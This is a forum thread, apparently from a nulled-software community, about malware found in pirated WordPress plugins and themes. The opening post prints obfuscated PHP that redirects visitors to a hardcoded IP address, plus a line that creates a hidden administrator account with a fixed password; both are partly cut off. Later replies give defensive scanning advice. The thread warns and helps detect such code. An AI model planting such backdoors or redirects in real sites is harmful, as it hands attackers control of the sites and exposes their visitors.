Wordpress Virus In Major Wordpress Plugin and theme Some if you using Nulled Version

R

riyaz1234

New member
Nov 13, 2019
2
0
1
<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$**okie-1"])&&!isset($COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600242);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a());}}};?>re


wp-load.php and themes fuction.php and header.php


<?php $createuser = wp_create_user('wordcamp', 'z43218765z', 'wo****-> set_role('administrator'); ?>



<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$c------------------------------------{if(stripos($SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600242);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a());}}};?>


<?php error_reporting(0);function a_($c_=32){$c0="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$-----------------------------------------------------------------------{if(stripos($SERVER['HTTP_USER_AGENT'],$c5)!==false){if(!isset($_COOKIE["wp-authcookie-1"])&&!isset($_COOKIE["wp-settings-time-1"])){setcookie("wp-authcookie-1","1",time()+3600242);header("L"."oc"."at"."io"."n: ht"."tp:"."//"."13"."4.2"."49."."11"."6.78"."/?"."ke"."y=".a());}}};?>
 
  • Wow
Reactions: huamu15 and ckeeper
Saint Gabriel

Saint Gabriel

Well-known member
Jan 3, 2020
2,998
3,049
113
Please, which theme or plugin is it that you got these from?

Also, which php file did you get it?
 
NullMaster

NullMaster

Well-known member
Null Master
Trusted Uploader
Jul 25, 2018
12,062
22,063
120
free website scan -> https://sitecheck.sucuri.net/

Apart from Official WordPress repository there are hundreds and thousands of websites which provides free WordPress themes and Plugins but the problem is you can not trust them always.

Yes, Most of them add a malicious code to themes and plugins which is not too easy for you to find out.

Before learning about the cure lets discuss about the cause.

Here is why they add their custom codes

  • To get backlink from your blog unknowingly
  • To get access to your blog
  • To redirect your blog to spam links
  • To add their advertisements and banners.
  • or to simply get your website down
Not only free themes and plugins also the premium nulled plugins and themes that you have download from Warez and torrents may also infected by these malicious codes.
My Confessions

Did you wonder what triggered me write this article ?

Yes, I too fell prey to these free plugins.Few days back, I was desperate to download a very famous nulled plugin from warez and after installing it in my blog I got to know that the plugin was infected and it redirects my blog to a spam blog.

I immediately disabled the plugin and checked for the code that caused the redirection in plugin files. After an hour I found the code and immediately removed it [ I don’t use that plugin now ]

This incident taught me very important thing.

Never trust nulled WordPress plugins and themes
Click to expand...

However many of you might want to use those nulled or free plugins and themes for God’s Sake, If you are one of them then read the remaining article
Detecting Malicious codes

After downloading the plugin or theme,The first thing you should do is to check for virus,trojans and other worms that you may not like it.
Check for Virus and Trojans

Go to VirusTotal.com and upload the zip file to check for virus.

If your file is infected you will get a red signal and if not then you can move on to next step.

VirusTotal Scan result

VirusTotal Scan result
Check for unwanted codes in Plugins

Now lets check for unwanted codes in plugins using another WordPress plugin called Exploit Scanner,which can be securely downloaded from WordPress website.

After installing it go to Dashboard >> Tools >> Exploit Scanner and run the scan.It will take some time to complete the scan and the time depends on number of plugins you have installed.

After the scan you can see a list of codes that are suspected.You can use the browser search function to find the plugins that you installed from outside WordPress repository.

Exploit Scanner

Exploit Scanner

[mybox]Note : This plugin will also scan themes but you might to be interested to try the tip that I am about to give next.[/mybox]
Check for Theme authenticity

Adding a backlink in a free theme is very common technique but you can easily find those exploited themes by the plugin called Theme Authenticity Checker (TAC).

Install the plugin and go to Dashboard >> Appearance >> TAC

You can see the list of themes installed with their authenticity result.It will give a warning if any encrypted links are found in a theme.

Theme Authenticity Checker


Theme Authenticity Checker
Security is in your hands

Its very rare to get hacked unless,We make mistake.So,security is in your hand : Either Act wisely or get fooled easily.
 
Last edited:
  • Like
Reactions: kvtech, Region25, Japan and 3 others
R

riyaz1234

New member
Nov 13, 2019
2
0
1
no any virus or tool can be able to find out this or nor any web site can scanner this type code i have tried this all tool
 
Saint Gabriel

Saint Gabriel

Well-known member
Jan 3, 2020
2,998
3,049
113
riyaz1234 said:
no any virus or tool can be able to find out this or nor any web site can scanner this type code i have tried this all tool
Click to expand...

Most of us have been using nulled files from Babiato for a while now and we're yet to get hacked.

Tell us what we're missing.
 
  • Haha
Reactions: amit338
Japan

Japan

Active member
Dec 23, 2018
189
149
43
zorerkek said:
free website scan -> https://sitecheck.sucuri.net/

Apart from Official WordPress repository there are hundreds and thousands of websites which provides free WordPress themes and Plugins but the problem is you can not trust them always.

Yes, Most of them add a malicious code to themes and plugins which is not too easy for you to find out.

Before learning about the cure lets discuss about the cause.

Here is why they add their custom codes

  • To get backlink from your blog unknowingly
  • To get access to your blog
  • To redirect your blog to spam links
  • To add their advertisements and banners.
  • or to simply get your website down
Not only free themes and plugins also the premium nulled plugins and themes that you have download from Warez and torrents may also infected by these malicious codes.
My Confessions

Did you wonder what triggered me write this article ?

Yes, I too fell prey to these free plugins.Few days back, I was desperate to download a very famous nulled plugin from warez and after installing it in my blog I got to know that the plugin was infected and it redirects my blog to a spam blog.

I immediately disabled the plugin and checked for the code that caused the redirection in plugin files. After an hour I found the code and immediately removed it [ I don’t use that plugin now ]

This incident taught me very important thing.



However many of you might want to use those nulled or free plugins and themes for God’s Sake, If you are one of them then read the remaining article
Detecting Malicious codes

After downloading the plugin or theme,The first thing you should do is to check for virus,trojans and other worms that you may not like it.
Check for Virus and Trojans

Go to VirusTotal.com and upload the zip file to check for virus.

If your file is infected you will get a red signal and if not then you can move on to next step.

VirusTotal Scan result

VirusTotal Scan result
Check for unwanted codes in Plugins

Now lets check for unwanted codes in plugins using another WordPress plugin called Exploit Scanner,which can be securely downloaded from WordPress website.

After installing it go to Dashboard >> Tools >> Exploit Scanner and run the scan.It will take some time to complete the scan and the time depends on number of plugins you have installed.

After the scan you can see a list of codes that are suspected.You can use the browser search function to find the plugins that you installed from outside WordPress repository.

Exploit Scanner

Exploit Scanner

[mybox]Note : This plugin will also scan themes but you might to be interested to try the tip that I am about to give next.[/mybox]
Check for Theme authenticity

Adding a backlink in a free theme is very common technique but you can easily find those exploited themes by the plugin called Theme Authenticity Checker (TAC).

Install the plugin and go to Dashboard >> Appearance >> TAC

You can see the list of themes installed with their authenticity result.It will give a warning if any encrypted links are found in a theme.

Theme Authenticity Checker


Theme Authenticity Checker
Security is in your hands

Its very rare to get hacked unless,We make mistake.So,security is in your hand : Either Act wisely or get fooled easily.
Click to expand...
Great tips @zorerkek! Thank you.
But those 2 plugins you reffered Exploit Scanner and Theme Authenticity Checker (TAC):
"hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress"
Click to expand...
so they are dangerous by themselves...
The function like exploit scanning cab be achived by very reputable All In One WP Security & Firewall
 
You must log in or register to reply here.

Similar threads

fan
Null and Activate Premium WordPress Themes and Plugins
Replies
1
Views
79
General Discussion
alexmisaila
alexmisaila
kagah
Is it possible to sell a WordPress theme here?
Replies
1
Views
40
General Discussion
Minion01
Minion01
riteshdeshmukh264
I will create a multi-page good looking Wordpress Website for Absolutely free!
Replies
1
Views
208
General Discussion
feer
feer
jacnat57
UNABLE TO INSTALL WORDPRESS THEMES DOWNLADED FROM HERE:
Replies
11
Views
406
General Discussion
comcpa2022
comcpa2022
M
WordPress Website
Replies
0
Views
191
General Discussion
Mike Juke
M
START MAKING $750+/DAY

Latest posts

Forum statistics

Threads
69,408
Messages
909,598
Members
239,279
Latest member
jeslewisParis

Share this page

Share this page

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

Forums Contact us

User Menu

Login
Community platform by XenForo © 2010-2022 XenForo Ltd.
Top Bottom